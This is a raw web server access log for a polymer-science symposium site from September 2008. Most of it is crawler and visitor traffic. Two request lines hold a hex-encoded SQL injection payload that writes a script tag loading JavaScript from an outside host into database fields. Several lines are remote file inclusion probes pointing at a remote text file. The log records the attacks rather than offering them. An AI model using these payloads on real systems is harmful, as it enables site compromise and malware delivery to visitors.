64.246.161.190 - - [21/Sep/2008:22:07:30 -0400] "GET / HTTP/1.1" 200 326 "http://www.whois.sc/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
208.80.194.38 - - [21/Sep/2008:23:32:11 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; ZangoToolbar 4.8.3)" 0 www.geil-symposium.com
91.205.124.13 - - [22/Sep/2008:00:41:51 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
74.6.22.174 - - [22/Sep/2008:04:01:08 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [22/Sep/2008:04:01:09 -0400] "GET /logs/error.log HTTP/1.0" 200 70489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:04:35:18 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:04:35:18 -0400] "GET /images/top_logoarea.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
217.118.0.121 - - [22/Sep/2008:04:56:35 -0400] "GET /logs/access.log HTTP/1.1" 200 101015 "-" "ukkusfo frhkobDtttkDxDduilusemejiad" 18 www.geil-symposium.com
96.228.169.128 - - [22/Sep/2008:05:45:12 -0400] "GET / HTTP/1.1" 200 322 "-" "Mozilla/4.0" 0 www.geil-symposium.com
119.14.7.212 - - [22/Sep/2008:06:11:50 -0400] "GET /logs/access.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 101289 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 2 www.geil-symposium.com
119.14.7.212 - - [22/Sep/2008:06:11:50 -0400] "GET /logs/access.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 101289 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 2 www.geil-symposium.com
38.99.13.124 - - [22/Sep/2008:07:07:08 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.174 - - [22/Sep/2008:10:38:45 -0400] "GET /Program.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
91.205.124.13 - - [22/Sep/2008:10:42:05 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
74.6.18.222 - - [22/Sep/2008:12:17:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [22/Sep/2008:12:17:16 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
217.118.0.121 - - [22/Sep/2008:12:43:31 -0400] "GET /logs/access.log HTTP/1.1" 200 105223 "-" "aobnboykYsovdtonepmtsn ybYhmu" 7 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:13:26:36 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:17:11:12 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:17:11:12 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:17:11:12 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:19:51:12 -0400] "GET /logs/access.log HTTP/1.1" 200 106095 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [22/Sep/2008:20:09:40 -0400] "GET /logs/error.log HTTP/1.1" 200 72167 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 1 www.geil-symposium.com
74.6.22.174 - - [23/Sep/2008:03:14:04 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [23/Sep/2008:03:14:05 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [23/Sep/2008:04:11:06 -0400] "GET /logs/error.log HTTP/1.0" 200 72646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
131.188.237.89 - - [23/Sep/2008:04:40:39 -0400] "GET /favicon.ico HTTP/1.1" 404 - "http://www.google.de/search?q=torsion+pendulum+polymer&sourceid=navclient-ff&ie=UTF-8&rlz=1B2GGGL_deDE177" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0" 0 www.geil-symposium.com
208.80.194.43 - - [23/Sep/2008:05:06:05 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; InfoPath.1)" 0 www.geil-symposium.com
74.6.22.174 - - [23/Sep/2008:06:28:27 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
38.99.13.124 - - [23/Sep/2008:07:11:41 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
202.179.180.45 - - [23/Sep/2008:15:21:42 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [23/Sep/2008:15:21:48 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
79.119.123.169 - - [23/Sep/2008:15:31:53 -0400] "GET /logs/access.log HTTP/1.1" 200 108314 "-" "eccvlkxec ddei4ngmdxrhnugjlw4vd" 1 www.geil-symposium.com
217.118.0.121 - - [23/Sep/2008:18:11:01 -0400] "GET /logs/access.log HTTP/1.1" 200 108468 "-" "gt4ruledx twcjmjbnbqp seqfdkqhch" 9 www.geil-symposium.com
38.99.13.124 - - [23/Sep/2008:21:46:49 -0400] "GET /logs/access.log HTTP/1.0" 200 108622 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.43 - - [24/Sep/2008:03:44:46 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; ZangoToolbar 4.8.3; yplus 4.1.00d)" 0 www.geil-symposium.com
38.99.13.124 - - [24/Sep/2008:06:11:17 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
69.73.156.7 - - [24/Sep/2008:08:18:05 -0400] "GET /404.php?Document_root=http://devel.smoothprojects.com/images/gha-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
69.73.156.7 - - [24/Sep/2008:09:06:37 -0400] "GET /logs/error.log/404.php?Document_root=http://devel.smoothprojects.com/images/gha-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
69.73.156.7 - - [24/Sep/2008:09:06:37 -0400] "GET /404.php?Document_root=http://devel.smoothprojects.com/images/gha-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
69.73.156.7 - - [24/Sep/2008:09:06:37 -0400] "GET /logs/404.php?Document_root=http://devel.smoothprojects.com/images/gha-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
70.38.12.180 - - [24/Sep/2008:14:15:00 -0400] "GET /logs/access.log HTTP/1.1" 200 109985 "-" "egchulsifudv2csupWxnxsxqWhw" 0 www.geil-symposium.com
74.6.22.174 - - [24/Sep/2008:14:25:11 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [24/Sep/2008:14:25:12 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
217.118.0.121 - - [24/Sep/2008:15:01:16 -0400] "GET /logs/access.log HTTP/1.1" 200 110519 "-" "fuxpseBxcmh9d9rxodtsmovmjvpqvqptjqirmuk" 10 www.geil-symposium.com
86.34.218.113 - - [24/Sep/2008:15:31:44 -0400] "GET /logs/access.log HTTP/1.1" 200 110681 "-" "tccyv9plovalkeoifq grxej9jiqivfoi bll" 1 www.geil-symposium.com
217.118.0.121 - - [24/Sep/2008:16:09:33 -0400] "GET /logs/access.log HTTP/1.1" 200 110840 "-" "nkompujjowudbea ag4p" 14 www.geil-symposium.com
152.7.204.59 - - [24/Sep/2008:19:11:34 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&q=crystallization+of+polyethylene+naphthalate&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 0 www.geil-symposium.com
74.6.22.174 - - [24/Sep/2008:20:36:38 -0400] "GET /logs/access.log HTTP/1.0" 200 111245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
217.118.0.121 - - [25/Sep/2008:03:45:21 -0400] "GET /logs/access.log HTTP/1.1" 200 111448 "-" "pt0cmrktdb jddssbhsphigeicsrych" 7 www.geil-symposium.com
66.249.65.200 - - [25/Sep/2008:04:30:23 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [25/Sep/2008:04:30:23 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
217.118.0.121 - - [25/Sep/2008:06:18:01 -0400] "GET /logs/access.log HTTP/1.1" 200 111873 "-" "ilkBsBxtnvwp4iwnrllnbjmyi" 13 www.geil-symposium.com
38.99.13.124 - - [25/Sep/2008:08:21:27 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
217.118.0.121 - - [25/Sep/2008:09:51:24 -0400] "GET /logs/access.log HTTP/1.1" 200 112198 "-" "dwg4yhlebfrtllm4gkdwmcgerdemsld motliuc" 15 www.geil-symposium.com
203.209.252.68 - - [25/Sep/2008:10:12:55 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [25/Sep/2008:10:12:56 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
74.6.18.222 - - [25/Sep/2008:12:07:44 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [25/Sep/2008:12:07:44 -0400] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [25/Sep/2008:12:07:44 -0400] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.38 - - [25/Sep/2008:15:49:41 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" 0 www.geil-symposium.com
202.179.180.45 - - [25/Sep/2008:19:39:17 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [25/Sep/2008:19:39:24 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
24.130.231.211 - - [25/Sep/2008:23:19:53 -0400] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
74.6.22.174 - - [26/Sep/2008:05:15:52 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [26/Sep/2008:05:15:52 -0400] "GET /logs/error.log HTTP/1.0" 200 77434 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
41.220.75.3 - - [26/Sep/2008:07:45:23 -0400] "GET /logs/access.log HTTP/1.1" 200 24561 "http://www.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=%2B61+++++++++++++++++++&aqp=2008&aqo=@yahoo.com+++++++++++++++++++++++++++++++++++++++++++++++++++++@gmail.com&aqn=spam&kgs=1&kls=0&d2=0&dt=dtrange&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=2008&dto%5Bd%5D=26&dto%5Bm%5D=9&dto%5By%5D=2008&filetype=text&rc=dmn&swd=com&lh=&nbq=50" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; FDM; Crazy Browser 3.0.0 RC1)" 62 www.geil-symposium.com
38.99.13.124 - - [26/Sep/2008:08:49:43 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
77.92.85.100 - - [26/Sep/2008:09:50:56 -0400] "GET /logs/access.log HTTP/1.1" 200 115224 "-" "Oylpy owpeklpOajhhc4idybpnjq" 1 www.geil-symposium.com
66.249.65.200 - - [26/Sep/2008:16:02:34 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [26/Sep/2008:16:02:34 -0400] "GET /images/DaikinLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
74.6.22.174 - - [26/Sep/2008:19:29:05 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [26/Sep/2008:19:29:05 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.34 - - [26/Sep/2008:21:35:22 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; HbTools 4.8.4)" 0 www.geil-symposium.com
74.6.18.246 - - [27/Sep/2008:05:27:04 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.246 - - [27/Sep/2008:05:27:05 -0400] "GET /logs/error.log HTTP/1.0" 200 78871 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
74.6.18.246 - - [27/Sep/2008:07:36:09 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.246 - - [27/Sep/2008:07:36:09 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
77.92.85.100 - - [27/Sep/2008:11:59:23 -0400] "GET /logs/access.log HTTP/1.1" 200 117090 "-" "vlaIdaeuedlnq0awlhIcInyjooxhqavfgpi" 0 www.geil-symposium.com
66.34.204.26 - - [27/Sep/2008:12:23:34 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [27/Sep/2008:12:23:34 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [27/Sep/2008:12:23:34 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
74.6.18.223 - - [27/Sep/2008:13:01:13 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.223 - - [27/Sep/2008:13:01:13 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [27/Sep/2008:15:39:52 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [27/Sep/2008:15:39:52 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [27/Sep/2008:16:16:51 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [27/Sep/2008:16:27:33 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
74.6.8.91 - - [27/Sep/2008:17:39:24 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.91 - - [27/Sep/2008:17:39:24 -0400] "GET /logs/error.log HTTP/1.0" 200 80049 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [27/Sep/2008:19:47:49 -0400] "GET /images/logo_dupont.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
74.6.8.91 - - [27/Sep/2008:21:32:11 -0400] "GET /logs/access.log HTTP/1.0" 200 119562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.119 - - [27/Sep/2008:22:34:53 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.119 - - [27/Sep/2008:22:34:53 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
77.92.85.100 - - [27/Sep/2008:22:47:28 -0400] "GET /logs/access.log HTTP/1.1" 200 120154 "-" "iech o9jsuK9evgtou9xvrjyok" 1 www.geil-symposium.com
208.80.194.33 - - [28/Sep/2008:03:54:34 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; knst; knst2007; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Alexa Toolbar; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Sep/2008:04:03:29 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Sep/2008:04:03:29 -0400] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [28/Sep/2008:04:24:17 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [28/Sep/2008:06:27:27 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [28/Sep/2008:06:27:27 -0400] "GET /images/top_logoarea.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
87.122.205.105 - - [28/Sep/2008:13:19:45 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)" 0 www.geil-symposium.com
87.122.205.105 - - [28/Sep/2008:13:19:45 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)" 0 www.geil-symposium.com
87.122.205.105 - - [28/Sep/2008:13:19:45 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Sep/2008:14:10:04 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [28/Sep/2008:14:10:04 -0400] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
86.83.121.73 - - [28/Sep/2008:16:22:44 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GoogleT5)" 0 www.geil-symposium.com
86.83.121.73 - - [28/Sep/2008:16:37:51 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GoogleT5)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Sep/2008:17:54:40 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [28/Sep/2008:17:54:40 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
64.246.178.34 - - [28/Sep/2008:22:12:11 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.178.34 - - [28/Sep/2008:22:12:11 -0400] "GET / HTTP/1.1" 200 326 "http://www.whois.sc/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
208.80.194.29 - - [29/Sep/2008:00:43:51 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sbcydsl 3.12; YPC 3.2.0; yplus 5.1.03b)" 0 www.geil-symposium.com
12.219.33.199 - - [29/Sep/2008:09:52:58 -0400] "GET /Scholarship.html HTTP/1.1" 404 - "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&q=university+of+illinois+foundation+studor&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2" 0 www.geil-symposium.com
12.219.33.199 - - [29/Sep/2008:09:52:59 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2" 0 www.geil-symposium.com
12.219.33.199 - - [29/Sep/2008:09:53:02 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2" 0 www.geil-symposium.com
